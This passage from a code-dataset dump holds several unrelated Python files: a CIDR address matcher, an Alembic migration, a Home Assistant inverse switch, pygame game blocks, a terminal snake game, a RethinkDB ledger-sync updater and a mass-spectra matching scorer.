cidr(address)\n    y = cidr(components[0])\n\n    return (x & mask) == y\n\n#if __name__ == '__main__':\n#    print(in_cidr('10.0.0.7', '10.0.0.0/29'))\n#    print(in_cidr('10.0.0.8', '10.0.0.0/29'))\n#    print(in_cidr('127.0.0.1', '127.0.0.1'))\n#    print(in_cidr('10.0.0.20', '10.0.0.0/24'))\n","repo_name":"jbeyers/Products.PASIPAuth","sub_path":"Products/PASIPAuth/cidr.py","file_name":"cidr.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
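A small sketch of the mask arithmetic above for a /29: shifting 0xFFFFFFFF right by 29 leaves only the low 3 bits set, and inverting (then clamping to 32 bits) yields a mask covering the top 29 bits, so addresses .0 through .7 fall inside the network.

print(format(~(0xFFFFFFFF >> 29) & 0xFFFFFFFF, '032b'))  # 29 ones followed by 3 zeros
print(in_cidr('10.0.0.7', '10.0.0.0/29'))   # True  (7 is within the 8-address block)
print(in_cidr('10.0.0.8', '10.0.0.0/29'))   # False (8 starts the next block)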
+{"seq_id":"22178612096","text":"\"\"\"Add Department.max_consecutive_hours\n\nRevision ID: 82e95f305078\nRevises: da22d6a6407c\nCreate Date: 2018-11-30 16:10:08.348278\n\n\"\"\"\n\n\n# revision identifiers, used by Alembic.\nrevision = '82e95f305078'\ndown_revision = 'da22d6a6407c'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n\ntry:\n is_sqlite = op.get_context().dialect.name == 'sqlite'\nexcept:\n is_sqlite = False\n\nif is_sqlite:\n op.get_context().connection.execute('PRAGMA foreign_keys=ON;')\n utcnow_server_default = \"(datetime('now', 'utc'))\"\nelse:\n utcnow_server_default = \"timezone('utc', current_timestamp)\"\n\ndef sqlite_column_reflect_listener(inspector, table, column_info):\n \"\"\"Adds parenthesis around SQLite datetime defaults for utcnow.\"\"\"\n if column_info['default'] == \"datetime('now', 'utc')\":\n column_info['default'] = utcnow_server_default\n\nsqlite_reflect_kwargs = {\n 'listeners': [('column_reflect', sqlite_column_reflect_listener)]\n}\n\n# ===========================================================================\n# HOWTO: Handle alter statements in SQLite\n#\n# def upgrade():\n# if is_sqlite:\n# with op.batch_alter_table('table_name', reflect_kwargs=sqlite_reflect_kwargs) as batch_op:\n# batch_op.alter_column('column_name', type_=sa.Unicode(), server_default='', nullable=False)\n# else:\n# op.alter_column('table_name', 'column_name', type_=sa.Unicode(), server_default='', nullable=False)\n#\n# ===========================================================================\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('department', sa.Column('max_consecutive_hours', sa.Integer(), server_default='0', nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('department', 'max_consecutive_hours')\n # ### end Alembic commands ###\n","repo_name":"magfest/ubersystem","sub_path":"alembic/versions/82e95f305078_add_department_max_consecutive_hours.py","file_name":"82e95f305078_add_department_max_consecutive_hours.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"3"}
+{"seq_id":"31776120606","text":"\"\"\"Inverse support for switch entities.\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Any\n\nfrom homeassistant.components.switch import DOMAIN as SWITCH_DOMAIN, SwitchEntity\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import CONF_ENTITY_ID\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers import entity_registry as er\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\n\nfrom .entity import BaseToggleEntity\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_entities: AddEntitiesCallback,\n) -> None:\n \"\"\"Initialize Inverse Switch config entry.\"\"\"\n registry = er.async_get(hass)\n entity_id = er.async_validate_entity_id(\n registry, config_entry.options[CONF_ENTITY_ID]\n )\n\n async_add_entities(\n [\n InvertSwitch(\n hass,\n config_entry.title,\n SWITCH_DOMAIN,\n entity_id,\n config_entry.entry_id,\n )\n ]\n )\n\n\nclass InvertSwitch(BaseToggleEntity, SwitchEntity):\n \"\"\"Represents a Switch as Inversed.\"\"\"\n\n @property\n def is_on(self) -> bool | None:\n \"\"\"Return true if the entity is off.\"\"\"\n return not self._attr_is_on\n\n async def async_turn_on(self, **kwargs: Any) -> None:\n \"\"\"Turn off original switch.\"\"\"\n await super().async_turn_off()\n\n async def async_turn_off(self, **kwargs: Any) -> None:\n \"\"\"Turn on original switch.\"\"\"\n await super().async_turn_on()\n","repo_name":"disforw/inverse","sub_path":"custom_components/inverse/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"35065621998","text":"from pygame import *\r\nimport os\r\nimport pyganim\r\nfrom camera import Camera\r\n\r\nPLATFORM_WIDTH = 32\r\nPLATFORM_HEIGHT = 32\r\nPLATFORM_COLOR = \"#FF6262\"\r\nBKGRND_COLOR = \"#004400\"\r\nICON_DIR = os.path.dirname(__file__)  # full path to the directory with the asset files\r\n\r\nANIMATION_BLOCKTELEPORT = [\r\n    ('%s/blocks/portal2.png' % ICON_DIR, 200),\r\n    ('%s/blocks/portal1.png' % ICON_DIR, 200)]\r\n\r\nANIMATION_PRINCESS = [\r\n    ('%s/blocks/princess_l.png' % ICON_DIR, 800),\r\n    ('%s/blocks/princess_r.png' % ICON_DIR, 800)]\r\n\r\nclass BlockStatic(sprite.Sprite):\r\n    def __init__(self, x, y, width, height):\r\n        sprite.Sprite.__init__(self)\r\n        self.image = Surface((width, height))\r\n        self.rect = Rect(x, y, width, height)\r\n    def draw(self, screen: Surface, camera: Camera):\r\n        screen.blit(self.image, camera.transformSprite(self))\r\n\r\nclass Platform(BlockStatic):\r\n    def __init__(self, x, y):\r\n        BlockStatic.__init__(self, x, y, PLATFORM_WIDTH, PLATFORM_HEIGHT)\r\n        self.image = image.load(\"%s/blocks/platform.png\" % ICON_DIR)\r\n\r\nclass BlockDie(BlockStatic):\r\n    def __init__(self, x, y):\r\n        BlockStatic.__init__(self, x, y, PLATFORM_WIDTH, PLATFORM_HEIGHT)\r\n        self.image = image.load(\"%s/blocks/dieBlock.png\" % ICON_DIR)\r\n\r\nclass BlockAnimated(BlockStatic):\r\n    def __init__(self, x, y, width, height, animation):\r\n        BlockStatic.__init__(self, x, y, width, height)\r\n        self.boltAnim = pyganim.PygAnimation(animation)\r\n        self.boltAnim.play()\r\n\r\n    def draw(self, screen: Surface, camera: Camera):\r\n        self.image.fill(Color(BKGRND_COLOR))\r\n        self.boltAnim.blit(self.image, (0, 0))\r\n        BlockStatic.draw(self, screen, camera)\r\n\r\nclass BlockTeleport(BlockAnimated):\r\n    def __init__(self, x, y, goX, goY):\r\n        BlockAnimated.__init__(self, x, y, PLATFORM_WIDTH, PLATFORM_HEIGHT, ANIMATION_BLOCKTELEPORT)\r\n        self.goX = goX  # destination coordinates of the teleport\r\n        self.goY = goY  # destination coordinates of the teleport\r\n\r\nclass Princess(BlockAnimated):\r\n    def __init__(self, x, y):\r\n        BlockAnimated.__init__(self, x, y, PLATFORM_WIDTH, PLATFORM_HEIGHT, ANIMATION_PRINCESS)\r\n","repo_name":"igor-a-yastrebov/Python-First-Game","sub_path":"blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71551300560","text":"# -*- coding: utf-8 -*-\n\n'''\n@Author : Corley Tang\n@contact : cutercorleytd@gmail.com\n@Github : https://github.com/corleytd\n@Time : 2023-11-17 22:11\n@Project : Hands-on Crawler with Python-snake_advanced\nAdvanced snake - the food moves and the snake chases it:\n1. the player controls the food, not the snake;\n2. the snake speeds up automatically;\n3. the snake's body grows automatically;\n4. the snake's overall direction of movement is toward the food.\n'''\n\nimport random\nfrom collections import deque\nfrom copy import copy\n\nfrom blessed import Terminal\n\n# define constants\nterm = Terminal()  # the terminal\n\n# direction constants\nUP = term.KEY_UP\nDOWN = term.KEY_DOWN\nLEFT = term.KEY_LEFT\nRIGHT = term.KEY_RIGHT\ndirection = RIGHT  # initial default direction\ndirections = [UP, DOWN, LEFT, RIGHT]  # all directions\nMOVE_MAP = {LEFT: (0, -1), RIGHT: (0, 1), UP: (-1, 0), DOWN: (1, 0)}  # movement direction -> coordinate delta\nis_dead = False  # whether the game is over\n\n# glyphs\nBORDER = '-'  # border\nHEAD = 'O'  # snake head\nBODY = 'o'  # snake body\nFOOD = '*'  # food\nSPACE = ' '  # empty space\n\n# game parameters\nWIDTH = 30  # screen width\nHEIGHT = 20  # screen height\nsnake = deque([[6, 5], [6, 4], [6, 3]])  # the snake\nfood = [15, 10]  # the food\nscore = 0  # score\nspeed = 3  # game speed\nMAX_SPEED = 10  # maximum speed\n# the turn counter controls the snake's speed and body length\nSPEED_STEP = 2  # interval between speed increases\nBODY_STEP = 5  # interval between body growth\n\nwith term.cbreak(), term.hidden_cursor():  # context managers: raw key input, hidden cursor\n    # clear the screen\n    print(term.home + term.clear)\n\n    # build the world\n    world = [[SPACE for _ in range(WIDTH)] for _ in range(HEIGHT)]\n    # build the borders\n    for i in range(WIDTH):  # horizontal lines\n        world[0][i] = BORDER\n        world[-1][i] = BORDER\n    for i in range(HEIGHT):  # vertical lines\n        world[i][0] = BORDER\n        world[i][-1] = BORDER\n\n    # draw the snake\n    for i in snake:  # draw the body\n        world[i[0]][i[1]] = BODY\n    # draw the head\n    world[snake[0][0]][snake[0][1]] = HEAD\n    # draw the food\n    world[food[0]][food[1]] = FOOD\n\n    # draw the world\n    for row in world:\n        print(' '.join(row))\n\n    value = ''  # keyboard input\n    move = False  # whether anything has started moving\n    turn = 0  # turn counter\n    while value.lower() != 'q':  # loop until quit\n        value = term.inkey(timeout=1 / speed)  # block up to the timeout and read a key\n        if value.code in directions:  # only the four arrow keys start and steer movement\n            move = True\n        if not move:  # no arrow key yet: do not move, keep polling input\n            continue\n\n        # 1. move the snake\n        head = snake[0]  # snake head\n        y_delta = food[0] - head[0]  # Y distance between food and head\n        x_delta = food[1] - head[1]  # X distance between food and head\n        move_to = None  # preferred direction: toward the food, along the axis with the larger gap\n        if abs(y_delta) > abs(x_delta):  # the Y gap is larger than the X gap\n            if y_delta > 0:  # the food is below the head\n                move_to = DOWN\n            else:  # the food is above the head\n                move_to = UP\n        else:  # the X gap is at least as large\n            if x_delta > 0:  # the food is to the right of the head\n                move_to = RIGHT\n            else:  # the food is to the left of the head\n                move_to = LEFT\n\n        random.shuffle(directions)\n        move_tos = [move_to] + directions  # candidate directions, with some randomness\n        next_move = None  # the new head position, once a viable direction is found\n        for move_to in move_tos:\n            movement = MOVE_MAP.get(move_to)\n            head_ = copy(head)\n            # compute the new head position\n            head_[0] += movement[0]\n            head_[1] += movement[1]\n            # what currently occupies the new head cell\n            head_content = world[head_[0]][head_[1]]\n            if head_content == BORDER:  # the new head cell is a border\n                continue\n            elif head_content == BODY:  # the new head cell is part of the body\n                if head_ == snake[-1] and turn % BODY_STEP != 0:  # the cell is the tail and the body will not grow this turn, so the tail vacates it; otherwise this direction fails\n                    next_move = head_\n                    break\n                else:  # otherwise, try the next direction\n                    continue\n            else:  # any other cell is allowed\n                next_move = head_\n                break\n\n        # after trying every direction, the snake still cannot move\n        if not next_move:\n            break  # exit the game\n\n        world[food[0]][food[1]] = SPACE  # clear the current food cell before the snake moves\n        snake.appendleft(next_move)\n        world[head[0]][head[1]] = BODY  # after moving, the old head cell becomes body\n        world[next_move[0]][next_move[1]] = HEAD  # the new head cell becomes the head\n        if turn % BODY_STEP != 0:  # the body does not grow this turn\n            tail = snake.pop()  # pop the tail to keep the length constant\n            world[tail[0]][tail[1]] = SPACE  # the old tail cell becomes empty\n\n        if turn % SPEED_STEP == 0:  # speed up\n            speed = min(speed * 1.01, MAX_SPEED)\n\n        # 2. move the food\n        food_ = copy(food)\n        if value.code in directions:\n            direction = value.code\n        movement = MOVE_MAP.get(direction)\n        # the food's next position\n        food_[0] += movement[0]\n        food_[1] += movement[1]\n        food_content = world[food_[0]][food_[1]]\n\n        if food_content == HEAD or food_content == BODY:  # the food ran into the head or body: game over\n            is_dead = True\n        elif food_content == SPACE:  # the food may only move into empty space\n            food = food_  # move the food to the empty cell\n\n        if not is_dead:  # the game is not over\n            world[food[0]][food[1]] = FOOD  # redraw the food\n\n        print(term.move_yx(0, 0))  # move the cursor to the top-left corner\n        # redraw the world\n        for row in world:\n            print(' '.join(row))\n\n        score += 1\n        print(f'score: {score:2d} - speed: {speed:.2f}')\n\n        if is_dead:\n            break\n\n        turn += 1\n\nprint('game over')\n","repo_name":"corleytd/Hands-on-Crawler-with-Python","sub_path":"applications/snake_game/snake_advanced.py","file_name":"snake_advanced.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"38042179793","text":"import sys\n\nfrom environs import Env\nimport rethinkdb as r\n\nfrom rbac.common.addresser import AddressSpace, parse, get_address_type\nfrom rbac.common.logs import get_default_logger\nfrom rbac.common.util import bytes_from_hex\nfrom rbac.ledger_sync.deltas.decoding import TABLE_NAMES\nfrom rbac.server.db.relationships_query import (\n fetch_relationships_by_id,\n fetch_remote_id_relationships,\n)\n\nENV = Env()\nLOGGER = get_default_logger(__name__)\n\n\ndef get_role(conn, role_id):\n \"\"\"Get a role resource by role_id.\"\"\"\n resource = (\n r.table(\"roles\")\n .get_all(role_id, index=\"role_id\")\n .merge(\n {\n \"members\": fetch_remote_id_relationships(\n \"role_members\", \"role_id\", role_id\n )\n }\n )\n .without(\"created_date\", \"end_block_num\", \"id\", \"role_id\", \"start_block_num\")\n .coerce_to(\"array\")\n .run(conn)\n )\n return resource\n\n\ndef get_user(conn, next_id):\n \"\"\"Database query to get data on an individual user.\"\"\"\n resource = (\n r.table(\"users\")\n .get_all(next_id, index=\"next_id\")\n .merge(\n {\n \"id\": r.row[\"next_id\"],\n \"remote_id\": r.row[\"remote_id\"],\n \"name\": r.row[\"name\"],\n \"email\": r.row[\"email\"],\n \"username\": r.row[\"username\"],\n \"metadata\": r.row[\"metadata\"],\n \"memberOf\": fetch_relationships_by_id(\n \"role_members\", next_id, \"role_id\"\n ),\n }\n )\n .map(\n lambda user: (user[\"manager_id\"] != \"\").branch(\n user.merge({\"manager\": user[\"manager_id\"]}), user\n )\n )\n .without(\"next_id\", \"start_block_num\", \"end_block_num\")\n .coerce_to(\"array\")\n .run(conn)\n )\n return resource\n\n\ndef get_updater(conn, block_num):\n \"\"\" Returns an updater function, which can be used to update the database\n appropriately for a particular address/data combo.\n \"\"\"\n return lambda adr, rsc: _update(conn, block_num, adr, rsc)\n\n\ndef _update_state(conn, block_num, address, resource):\n \"\"\" Update the state, state_history and metadata tables\n \"\"\"\n try:\n # update state table\n now = r.now()\n address_parts = parse(address)\n address_binary = bytes_from_hex(address)\n object_id = bytes_from_hex(address_parts.object_id)\n object_type = address_parts.object_type.value\n related_id = bytes_from_hex(address_parts.related_id)\n related_type = address_parts.related_type.value\n relationship_type = address_parts.relationship_type.value\n\n data = {\n \"address\": address_binary,\n \"object_type\": object_type,\n \"object_id\": object_id,\n \"related_type\": related_type,\n \"relationship_type\": relationship_type,\n \"related_id\": related_id,\n \"block_created\": int(block_num),\n \"block_num\": int(block_num),\n \"updated_date\": now,\n **resource,\n }\n delta = {\"block_num\": int(block_num), \"updated_at\": now, **resource}\n\n query = (\n r.table(\"state\")\n .get(address_binary)\n .replace(\n lambda doc: r.branch(\n # pylint: disable=singleton-comparison\n (doc == None), # noqa\n r.expr(data),\n doc.merge(delta),\n ),\n return_changes=True,\n )\n )\n\n result = query.run(conn)\n\n if result[\"errors\"] > 0:\n LOGGER.warning(\"error updating state table:\\n%s\\n%s\", result, query)\n if result[\"replaced\"] and \"changes\" in result and result[\"changes\"]:\n query = r.table(\"state_history\").insert(result[\"changes\"][0][\"old_val\"])\n result = query.run(conn)\n # data[\"address\"] = [address_binary, int(block_num)]\n if result[\"errors\"] > 0:\n LOGGER.warning(\n \"error updating state_history table:\\n%s\\n%s\", result, query\n )\n\n if not 
related_id:\n            data[\"address\"] = address_binary\n            del data[\"related_type\"]\n            del data[\"relationship_type\"]\n            del data[\"related_id\"]\n            query = (\n                r.table(\"metadata\")\n                .get(address_binary)\n                .replace(\n                    lambda doc: r.branch(\n                        # pylint: disable=singleton-comparison\n                        (doc == None),  # noqa\n                        r.expr(data),\n                        doc.merge(delta),\n                    )\n                )\n            )\n            result = query.run(conn)\n            if result[\"errors\"] > 0:\n                LOGGER.warning(\"error updating metadata record:\\n%s\\n%s\", result, query)\n\n    except Exception as err:  # pylint: disable=broad-except\n        LOGGER.warning(\"update_state %s error:\", type(err))\n        LOGGER.warning(err)\n\n\ndef _update_legacy(conn, block_num, address, resource, data_type):\n    \"\"\" Update the legacy sync tables (expansion by object type name)\n    \"\"\"\n    try:\n        data = {\n            \"id\": address,\n            \"start_block_num\": int(block_num),\n            \"end_block_num\": int(sys.maxsize),\n            **resource,\n        }\n\n        query = (\n            r.table(TABLE_NAMES[data_type])\n            .get(address)\n            .replace(\n                lambda doc: r.branch(\n                    # pylint: disable=singleton-comparison\n                    (doc == None),  # noqa\n                    r.expr(data),\n                    doc.merge(resource),\n                )\n            )\n        )\n        result = query.run(conn)\n        if result[\"errors\"] > 0:\n            LOGGER.warning(\"error updating legacy state table:\\n%s\\n%s\", result, query)\n\n    except Exception as err:  # pylint: disable=broad-except\n        LOGGER.warning(\"_update_legacy %s error:\", type(err))\n        LOGGER.warning(err)\n\n\ndef format_role(role_resource):\n    \"\"\" Formats given role_resource into the proper format to be added to the data\n        field of an outbound_queue entry.\n\n    Args:\n        role_resource: (dict) A snapshot of the current state of the role from the\n            roles RethinkDB table. The mandatory keys in the dict are:\n                {\n                    \"name\": (str)\n                    \"members\": (array of strings containing members' remote_ids)\n                    \"remote_id\": (str)\n                }\n    Returns:\n        formatted_resource: (dict) Formatted version of role_resource to be inserted\n            into outbound_queue RethinkDB table. The formatted dict would look like:\n                {\n                    \"members\": (array of strings containing members' remote_ids)\n                    \"remote_id\": (str)\n                }\n    \"\"\"\n    if role_resource[\"remote_id\"] == \"\" and ENV.str(\"GROUP_BASE_DN\", \"\"):\n        remote_id = \"CN=\" + role_resource[\"name\"] + \",\" + ENV(\"GROUP_BASE_DN\")\n    else:\n        remote_id = role_resource[\"remote_id\"]\n    return {\"members\": role_resource[\"members\"], \"remote_id\": remote_id}\n\n\ndef get_provider(admin_identifier):\n    \"\"\" Gets the provider field value for an outbound_queue entry.\n\n    Args:\n        admin_identifier: (str) Name of role or username of user\n    Returns:\n        provider: (str) Depending on the current mode enabled, return\n            the proper provider value. 
The value is either `NEXT-created`,\n            LDAP_DC, or TENANT_ID set in .env file.\n    \"\"\"\n    if admin_identifier == \"NextAdmins\" or admin_identifier == ENV(\"NEXT_ADMIN_USER\"):\n        return \"NEXT-created\"\n    if ENV.int(\"ENABLE_LDAP_SYNC\", 0):\n        return ENV(\"LDAP_DC\")\n    if ENV.int(\"ENABLE_AZURE_SYNC\", 0):\n        return ENV(\"TENANT_ID\")\n    return \"NEXT-created\"\n\n\ndef _update_provider(conn, address_type, resource):\n    \"\"\"Places updated object on the provider outbound queue.\n\n    Gets the full details of the updated resource, adds it to the outbound\n    queue, where provider sync (ldap/azure) will pop the resource from the\n    queue & update the provider as needed.\n\n    Args:\n        conn: A rethinkDB connection\n        address_type: The type of the address\n        resource: The resource data\n    \"\"\"\n    outbound_types = {\n        AddressSpace.ROLES_ATTRIBUTES: \"role\",\n        AddressSpace.ROLES_MEMBERS: \"role\",\n    }\n    if address_type in outbound_types:\n        # Get the object & format it.\n        provider_action = \"\"\n        direction = \"\"\n        if outbound_types[address_type] == \"role\":\n            role = get_role(conn, resource[\"role_id\"])\n            if role:\n                formatted_resource = format_role(role[0])\n            else:\n                # The role has not been inserted into RethinkDB yet: the role\n                # relationship can arrive before the role object itself, so\n                # log it and skip this update.\n                LOGGER.debug(\n                    \"Role %s has not been inserted into RethinkDB yet...\",\n                    resource[\"role_id\"],\n                )\n                return\n            admin_identifier = role[0][\"name\"]\n            data_type = \"group\"\n            direction = role[0][\"metadata\"].get(\"sync_direction\", \"\")\n        # Insert to outbound queue.\n        if direction == \"OUTBOUND\":\n            provider = get_provider(admin_identifier)\n\n            outbound_entry = {\n                \"data\": formatted_resource,\n                \"data_type\": data_type,\n                \"timestamp\": r.now(),\n                \"provider_id\": provider,\n                \"status\": \"UNCONFIRMED\",\n                \"action\": provider_action,\n            }\n            r.table(\"outbound_queue\").insert(outbound_entry, return_changes=True).run(\n                conn\n            )\n    return\n\n\ndef _update(conn, block_num, address, resource):\n    \"\"\" Handle the update of a given address + resource update\n    \"\"\"\n    data_type = get_address_type(address)\n    pre_filter(resource)\n\n    _update_state(conn, block_num, address, resource)\n\n    if data_type in TABLE_NAMES:\n        _update_legacy(conn, block_num, address, resource, data_type)\n        _update_provider(conn, data_type, resource)\n\n\ndef pre_filter(resource):\n    \"\"\" Filters or modifies values prior to writing them to the rethink sync tables\n        1. Changes dates from Int64 to a DateTime (Int64 would otherwise get translated to a string)\n    \"\"\"\n    keys = [key for key in resource]\n    for key in keys:\n        if key.endswith(\"_date\"):\n            try:\n                value = resource[key]\n                if value and int(value) != 0:\n                    resource[key] = r.epoch_time(int(value))\n                else:\n                    del resource[key]\n            except Exception:  # pylint: disable=broad-except\n                del resource[key]\n","repo_name":"hyperledger-archives/sawtooth-next-directory","sub_path":"rbac/ledger_sync/deltas/updating.py","file_name":"updating.py","file_ext":"py","file_size_in_byte":10997,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"3"}
+{"seq_id":"38088041439","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 29 09:57:30 2018\n\n@author: HALGhoul\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 21 10:11:13 2017\n\n@author: Hussein Al Ghoul\n\"\"\"\n\nimport os\nimport time\nimport pandas as pd\nimport numpy as np\n\nm=0.5\nn=0.5\ndef Commons(chunks,dfU,ppm_sl,filtering,energy=False):\n print (\"starting Commons\")\n df_list=list()\n dfL_list=list()\n dfU['MASS_y'] = dfU['MASS'].round(6) \n #dfU.rename(columns={'PMASS':'PMASS_y'},inplace=True) \n dfU['MASS'] = dfU['MASS'].round(1)\n dfU['WEIGHTSM'] = (dfU['INTENSITY0M']**m)*(dfU['PMASS_y']**n)\n for chunk in chunks:\n df = None\n dfL = None\n dfInput = None\n dfL = chunk \n dfL['MASS_x'] = dfL['MASS']\n #dfL.rename(columns={'PMASS':'PMASS_x'},inplace=True) \n dfL['MASS'] = dfL['MASS'].round(1)\n #dfL = dfL.groupby(['MASS','DTXCID']).head(30)\n dfL['WEIGHTSC'] = (dfL['INTENSITY0C']**m)*(dfL['PMASS_x']**n)\n dfInput = dfU\n if energy:\n df = pd.merge(dfL,dfInput,how='left',on=['MASS','ENERGY']) \n else:\n df = pd.merge(dfL,dfInput,how='left',on='MASS') \n if ppm_sl >=1:\n df['MATCHES'] = np.where((((abs(df.PMASS_x-df.PMASS_y)/df.PMASS_x)*1000000)<=ppm_sl),'1','0') \n else:\n df['MATCHES'] = np.where((abs(df.PMASS_x-df.PMASS_y)<=ppm_sl),'1','0') \n df.drop(df[df['MATCHES'] == '0'].index,inplace=True)\n df.sort_values(['DTXCID','ENERGY','PMASS_x','INTENSITY0C'],ascending=[True,True,True,False],inplace=True) \n df_list.append(df)\n dfL_list.append(dfL)\n\n dft=pd.concat(df_list)\n dfLt=pd.concat(dfL_list)\n dft.to_csv(\"cfmid_match.csv\",index=False)\n\n if filtering:\n #dft['INTENSITY0CR'] = (dft['INTENSITY0C']/dft.groupby(['DTXCID','ENERGY'])['INTENSITY0C'].transform(sum))\n dft.sort_values(['DTXCID','ENERGY','INTENSITY0C'],ascending=[True,True,False],inplace=True) \n #dft['cumsum'] = dft['INTENSITY0CR'].cumsum()\n #dfLt = dfLt[dfLt['INTENSITY0CR'] > dfLt['INTENSITY0CR'].quantile(0.3)]\n '''select the top 30 matches only and filter out DTXCIDs with less than 5 matches'''\n dft = dft.groupby(['DTXCID','ENERGY']).head(30)\n dft = dft.groupby(['DTXCID','ENERGY']).filter(lambda x: len(x)>=5)\n #print dfLt.groupby(['DTXCID','ENERGY']).filter(lambda s: s.INTENSITY0CR.sum() <= 0.8)\n #dfLt = dfLt[dfLt['cumsum']<=0.8]\n #print dfL[dfL['INTENSITY0CR'].groupby(['DTXCID','ENERGY']).transform('sum') <=0.8]\n #print dfL\n else:\n dft = dft[(dft['INTENSITY0C']<=100) & (dft['INTENSITY0C']>0.0)] \n \n dft.to_csv(\"cfmid.csv\",index=False)\n\n WLI = dfLt.groupby(['MASS_x','DTXCID','FORMULA','ENERGY'])['WEIGHTSC'].apply(list).to_dict() \n #print WLI \n WUI = dfU.groupby('MASS_y')['WEIGHTSM'].apply(list).to_dict() \n #df.to_csv(\"Commons_Output.csv\",index=False)\n WL = dft.groupby(['MASS_x','DTXCID','FORMULA','ENERGY'])['WEIGHTSC'].apply(list).to_dict()\n WU = dft.groupby(['MASS_x','DTXCID','FORMULA','ENERGY'])['WEIGHTSM'].apply(list).to_dict()\n print(len(WL))\n #print WUI\n W = list()\n W.append(WL)\n W.append(WU)\n W.append(WLI)\n W.append(WUI)\n return W\n\ndef FR(WL,WU):\n #print WL\n #print WU\n num =0.0\n den = 0.0\n SUM = 0.0\n for i in range(0,len(WL)):\n num = WL[i]*WU[i-1]\n den = WL[i-1]*WU[i]\n if (num/den) <= 1:\n l = 1\n else:\n l = -1\n SUM += (num/den)**l \n F_R = (1.0/float(len(WL)))*SUM\n return F_R\n\ndef FD(WL,WU,WLI,WUI):\n #print WL\n #print WU\n SUMU = 0.0\n SUML = 0.0\n SUM = 0.0\n F_D = 0.0\n #print WUI\n for i in range(0,len(WUI)):\n #print WUI[i]\n SUMU += WUI[i]*WUI[i]\n #print SUMU\n for i in range(0,len(WLI)):\n SUML += WLI[i]*WLI[i]\n 
#print SUML\n for i in range(0,len(WL)):\n #print WU[i]\n SUM += WL[i]*WU[i]\n #print SUM\n F_D = (SUM*SUM)/(SUMU*SUML)\n #print F_D\n return F_D \n \ndef Score(dfL=None,dfU=None,Mass=0.0,ppm_sl=0,filtering=False,energy=False):\n DF=list()\n W = Commons(dfL,dfU,ppm_sl,filtering,energy)\n WL=set(W[0])\n #print WL\n WLI=set(W[2])\n record = list()\n records = list()\n #print WLI\n #for keys in WLI.intersection(WL):\n for keys in WLI:\n\n #print W[0][keys] \n #print W[1][Mass]\n N_LU=0\n F_D=0.0\n F_R=0.0\n score=0.0\n if keys in WLI.intersection(WL):\n N_LU = len(W[0][keys])\n N_U = len(W[3][Mass]) \n F_D = FD(W[0][keys],W[1][keys],W[2][keys],W[3][Mass])\n F_R = FR(W[0][keys],W[1][keys]) \n else:\n F_D = 0.0\n #score = ((N_U*F_D) + (N_LU*F_R))/(N_U + N_LU)\n record = list(keys)\n record.append(F_D)\n #record.append(score)\n records.append(record)\n #dfL_plot = dfL.loc[dfL['DTXCID'].isin([keys[1]])].reset_index()\n #plot(dfL_plot,dfU)\n dfi = pd.DataFrame.from_records(records,columns=['MASS','DTXCID','FORMULA','ENERGY','SCORE'])\n df = pd.DataFrame(columns=['MASS','DTXCID','FORMULA','ENERGY','SCORE'])\n dfs = pd.DataFrame(columns=['MASS','DTXCID','FORMULA','ENERGY','SCORE'])\n if not dfi.empty:\n dfi.sort_values(['ENERGY','SCORE'],ascending=[True,True],inplace=True)\n #df['RANK'] = df.groupby(['FORMULA','ENERGY'])['SCORE'].rank(method='dense',ascending=False) \n #df = df.pivot(index='DTXCID', columns='ENERGY', values='SCORE')\n dfp = pd.pivot_table(dfi,values='SCORE', index='DTXCID',columns='ENERGY').reset_index()\n print(dfp)\n df = pd.merge(dfi,dfp,how='inner',on='DTXCID')\n df.drop(['ENERGY','SCORE'], axis=1,inplace=True)\n df.drop_duplicates(subset=['DTXCID'],keep='first',inplace=True)\n if 'energy0' in df:\n df['RANK_E0'] = df.groupby(['FORMULA'])['energy0'].rank(method='dense',ascending=False) \n else:\n df['RANK_E0'] = None\n if 'energy1' in df: \n df['RANK_E1'] = df.groupby(['FORMULA'])['energy1'].rank(method='dense',ascending=False) \n else:\n df['RANK_E1'] = None # casing fixed so the fallback column matches RANK_E1 above\n if 'energy2' in df: \n df['RANK_E2'] = df.groupby(['FORMULA'])['energy2'].rank(method='dense',ascending=False)\n else:\n df['RANK_E2'] = None # casing fixed so the fallback column matches RANK_E2 above\n df.sort_values(['MASS','FORMULA','RANK_E0'],ascending=True,inplace=True) \n df['MATCHES'] = df.groupby(['MASS','FORMULA'])['FORMULA'].transform('count')\n df.reset_index()\n df.to_csv('try_the_index.csv',index=False)\n print (df)\n #df.to_csv('Score_Alllevels.csv',index=False)\n dfs = dfi.groupby(['DTXCID','MASS','FORMULA'],as_index=False)['SCORE'].sum()\n dfs.reset_index()\n dfs['RANK'] = dfs.groupby(['FORMULA'])['SCORE'].rank(method='dense',ascending=False) # rank according to formula here by adding ['FORMULA','ENERGY']\n dfs['MATCHES'] = dfs.groupby(['MASS','FORMULA'])['FORMULA'].transform('count')\n dfs.sort_values(['MASS','FORMULA','RANK'],ascending=True,inplace=True) \n #print (dfs)\n #dfs.to_csv(\"Score_Sum.csv\",index=False)\n print (\"Number of Matches: \" + str(len(WL)))\n DF.append(df)\n 